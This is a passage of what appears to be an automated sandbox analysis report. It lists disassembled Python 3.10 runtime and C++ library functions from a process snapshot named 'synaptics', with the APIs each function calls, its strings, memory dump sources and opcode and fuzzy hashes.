                                                                                                                                                                                                      • Opcode ID: b6f5f82b1389a39584014da38eb7e21261e6321a5e306f20a963089a2bd0cbd4
                                                                                                                                                                                                      • Instruction ID: 8f1d432043953c09a3c0d649188b3f7410982979d0451e929e05eca41946465c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6f5f82b1389a39584014da38eb7e21261e6321a5e306f20a963089a2bd0cbd4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D4123727052159FEB11DE69DC85B6677F8FBC6369F204A2AF818C2B50D7319804CBA1
                                                                                                                                                                                                      Function 73A8BF1D Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: operator+$Name::operator+
                                                                                                                                                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                      • API String ID: 1198235884-2239912363
                                                                                                                                                                                                      • Opcode ID: 2caf8287b642e13b76a7be74c15f1deb5503458f0efdb9cb38e68378683477da
                                                                                                                                                                                                      • Instruction ID: 5779694485a434bb6b31882712420456c9600d9d003a2fc79b3ad28bd2924f54
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2caf8287b642e13b76a7be74c15f1deb5503458f0efdb9cb38e68378683477da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D416771904309EFEB07CF90C846BEEBBB9BB04344F18815BE55A6B298DB759A44CF40
                                                                                                                                                                                                      Function 6C58FF10 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyCrossInterpreterData_Lookup.PYTHON310(?), ref: 6C58FF4E
                                                                                                                                                                                                        • Part of subcall function 6C590190: _PyErr_SetString.PYTHON310(?,null argument to internal routine,?,?,?,6C58FEDB,?), ref: 6C5901B5
                                                                                                                                                                                                        • Part of subcall function 6C590190: PyThread_acquire_lock_timed.PYTHON310(000000FF,000000FF,00000000,?,?,?,6C58FEDB,?), ref: 6C5901D3
                                                                                                                                                                                                        • Part of subcall function 6C590190: EnterCriticalSection.KERNEL32(?), ref: 6C590223
                                                                                                                                                                                                        • Part of subcall function 6C590190: ReleaseSemaphore.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,6C58FEDB,?), ref: 6C590242
                                                                                                                                                                                                        • Part of subcall function 6C590190: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,6C58FEDB,?), ref: 6C590249
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%S does not support cross-interpreter data,?), ref: 6C58FF71
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,missing new_object func), ref: 6C58FFF1
                                                                                                                                                                                                      • _PyCrossInterpreterData_Release.PYTHON310(?), ref: 6C58FFFA
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get), ref: 6C590018
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • missing new_object func, xrefs: 6C58FFE2
                                                                                                                                                                                                      • missing interp, xrefs: 6C58FFD5
                                                                                                                                                                                                      • %S does not support cross-interpreter data, xrefs: 6C58FF66
                                                                                                                                                                                                      • PyThreadState_Get, xrefs: 6C590013
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$CriticalCrossData_FormatInterpreterReleaseSectionString$ClearEnterError_FatalFromLeaveLookupObjectSemaphoreThread_acquire_lock_timedTstateUnicode_
                                                                                                                                                                                                      • String ID: %S does not support cross-interpreter data$PyThreadState_Get$missing interp$missing new_object func
                                                                                                                                                                                                      • API String ID: 1125598158-675868278
                                                                                                                                                                                                      • Opcode ID: 8323f000d3ec620722466fdd141b862ad31c651cc510b100bab9f098653f11c5
                                                                                                                                                                                                      • Instruction ID: 3b5b29dcc4743d93d5a298815190f41ad1d5c4279f84144ab3eb66a2ea677f16
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8323f000d3ec620722466fdd141b862ad31c651cc510b100bab9f098653f11c5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D31E471A052559FC3009F29EC00996B7F4EF8A338F044B6AE868C7E91E770E954C7D2
                                                                                                                                                                                                      Function 6C4A0A10 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 89COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?,?,?,?,?,?,6C4A0773,?), ref: 6C4A0A2D
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(bad argument type for built-in operation), ref: 6C4A0A4A
                                                                                                                                                                                                        • Part of subcall function 6C4D2B20: _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long,?,?,?,6C44F059,?), ref: 6C4D2B5A
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,bad argument type for built-in operation), ref: 6C4A0A54
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(tynl,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A0A79
                                                                                                                                                                                                      • _PyDict_GetItem_KnownHash.PYTHON310(?,00000000,?), ref: 6C4A0A8A
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C9A8,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,6C4A0773,?), ref: 6C4A0ADC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FromObjectStringUnicode_$Dict_HashItem_KnownSubtypeType_
                                                                                                                                                                                                      • String ID: bad argument type for built-in operation$nameless module$tynl
                                                                                                                                                                                                      • API String ID: 3072588093-41408607
                                                                                                                                                                                                      • Opcode ID: 767e01d32ce36cb9b6109d52e5139fe7ef2513ca671a77fc2733370e38fd797d
                                                                                                                                                                                                      • Instruction ID: 5a6f855f40a2e493d8658c6542085d6cb288590e14c0ca90631ff70fb7b96a8f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 767e01d32ce36cb9b6109d52e5139fe7ef2513ca671a77fc2733370e38fd797d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 322138727412005FE710DAD59C81F6637A8DB7122AF54416AEC199BF92E760FC02C7F1
                                                                                                                                                                                                      Function 6C4A0B50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4A0B6D
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(bad argument type for built-in operation), ref: 6C4A0B8A
                                                                                                                                                                                                        • Part of subcall function 6C4D2B20: _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long,?,?,?,6C44F059,?), ref: 6C4D2B5A
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,bad argument type for built-in operation), ref: 6C4A0B94
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(tolZ), ref: 6C4A0BAA
                                                                                                                                                                                                      • _PyDict_GetItem_KnownHash.PYTHON310(?,00000000,?), ref: 6C4A0BBB
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C9A8,00000000,00000000,00000000,00000000), ref: 6C4A0C0D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FromObjectStringUnicode_$Dict_HashItem_KnownSubtypeType_
                                                                                                                                                                                                      • String ID: bad argument type for built-in operation$module filename missing$tolZ
                                                                                                                                                                                                      • API String ID: 3072588093-1577265136
                                                                                                                                                                                                      • Opcode ID: 68f3bc91cedd11620ee8eab094078ce2b1fa9356778ee5b16285ac5129b46353
                                                                                                                                                                                                      • Instruction ID: bc12faf2c07de84db7183f04e3e0713666bbaf65240061d38a56648196256e94
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68f3bc91cedd11620ee8eab094078ce2b1fa9356778ee5b16285ac5129b46353
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C212872B012046BE710EAD5AD41FA677A8DB6126EF140564EC199BF92E720FC0283F2
                                                                                                                                                                                                      Function 6C4B0E30 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 57COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0E49
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0E63
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\setobject.c,00000916), ref: 6C4B0E8F
                                                                                                                                                                                                      • PyObject_Hash.PYTHON310(?), ref: 6C4B0EB3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: SubtypeType_$Err_FormatHashObject_
                                                                                                                                                                                                      • String ID: 6tl$%s:%d: bad argument to internal function$@Btl$D:\a\1\s\Objects\setobject.c$P5tl
                                                                                                                                                                                                      • API String ID: 818754449-2756820941
                                                                                                                                                                                                      • Opcode ID: 2a084d6bb3d25974f18865f14cc0b2473ca78fe86410b1ee2d598668ba24f3ad
                                                                                                                                                                                                      • Instruction ID: 078ce2b0ce56ec39d66c1ad07e99e457c1cb9d048ba6d19aedda5ffeab845be1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a084d6bb3d25974f18865f14cc0b2473ca78fe86410b1ee2d598668ba24f3ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5901F5B2A0111067490099696E41D9BB3694B5123FF198725F93CB3F91E730F98582F2
                                                                                                                                                                                                      Function 6C59FBD0 Relevance: 15.2, APIs: 10, Instructions: 181COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(00000000,?,6C7420B8), ref: 6C59FC29
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(00000000,?,00000000), ref: 6C59FC6E
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?), ref: 6C59FC93
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(00000000,?,00000000), ref: 6C59FCB0
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?), ref: 6C59FCD4
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(00000000,?,00000000), ref: 6C59FCF1
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?), ref: 6C59FD15
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttrObject_$FromLongLong_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 926964961-0
                                                                                                                                                                                                      • Opcode ID: 69a115d8fc8033f5d18681eea7b161ca443cc50a61f9f6b1ad6963fb015833c6
                                                                                                                                                                                                      • Instruction ID: b2bb928e57278bdfe7fe7cbb5dcf1421617f2825e5896b5cc9fa6a1353e749e0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69a115d8fc8033f5d18681eea7b161ca443cc50a61f9f6b1ad6963fb015833c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8519032A01611ABC7118EA8EC40ED677E4AF15278B1403B4FD69CB6B1E335ED56CBD1
                                                                                                                                                                                                      Function 6C4F4FA0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 218COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(?,6C73DC90,00000000,00000000,00000000), ref: 6C4F4FED
                                                                                                                                                                                                        • Part of subcall function 6C565880: PyTuple_Size.PYTHON310(?,?,?,?,?,6C452185,?,?,00000000,?), ref: 6C5658A3
                                                                                                                                                                                                      • _PyUnicode_ScanIdentifier.PYTHON310(00000000,00000000,00000000,00000000), ref: 6C4F5017
                                                                                                                                                                                                      • PyUnicode_Substring.PYTHON310(00000000,00000000,?,?,00000000,00000000,00000000), ref: 6C4F50E2
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,00000009,%04X,?,?,00000000,00000000,00000000), ref: 6C4F5159
                                                                                                                                                                                                      • _PyUnicode_IsPrintable.PYTHON310(?,?,00000009,%04X,?,?,00000000,00000000,00000000), ref: 6C4F515F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %04X, xrefs: 6C4F5151
                                                                                                                                                                                                      • invalid character '%c' (U+%s), xrefs: 6C4F5171
                                                                                                                                                                                                      • invalid non-printable character U+%s, xrefs: 6C4F5193
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unicode_$Err_ExceptionGivenIdentifierMatchesPrintableS_snprintfScanSizeSubstringTuple_
                                                                                                                                                                                                      • String ID: %04X$invalid character '%c' (U+%s)$invalid non-printable character U+%s
                                                                                                                                                                                                      • API String ID: 122625241-3619752902
                                                                                                                                                                                                      • Opcode ID: 3efda1650d90897e8eb7d20fbf8a16842fa5dc98340189f8e53b185fbac9b139
                                                                                                                                                                                                      • Instruction ID: 30fb457f18fba95a1e3240471bb4477ee3734b86aae33f00f5a97e7232fe14ac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3efda1650d90897e8eb7d20fbf8a16842fa5dc98340189f8e53b185fbac9b139
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA6104717006014FD710CE69DD81E9673F4AB84329F00862DE96ACBB81EB25EC0AC7C2
                                                                                                                                                                                                      Function 73A8BCCE Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 178COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: operator+shared_ptr
                                                                                                                                                                                                      • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                      • API String ID: 864562889-757766384
                                                                                                                                                                                                      • Opcode ID: 40ab22c69528bf0877138b0dd40bd2050d34c37ebbd3f673aa62f17becb4d25d
                                                                                                                                                                                                      • Instruction ID: ead25bf73c94dd179132fc5bf5cb0ad98dd205180acca67ec53fd51947fcf7d8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40ab22c69528bf0877138b0dd40bd2050d34c37ebbd3f673aa62f17becb4d25d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35616C71800309EFDB07DF65C446BEA7BB9FB08304F14826BD549AB269EB329605CF40
                                                                                                                                                                                                      Function 6C4759D0 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 167COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyMem_Malloc.PYTHON310(55555556), ref: 6C475A45
                                                                                                                                                                                                      • _PyObject_GC_New.PYTHON310(?), ref: 6C475A5D
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000AC4), ref: 6C475BA2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
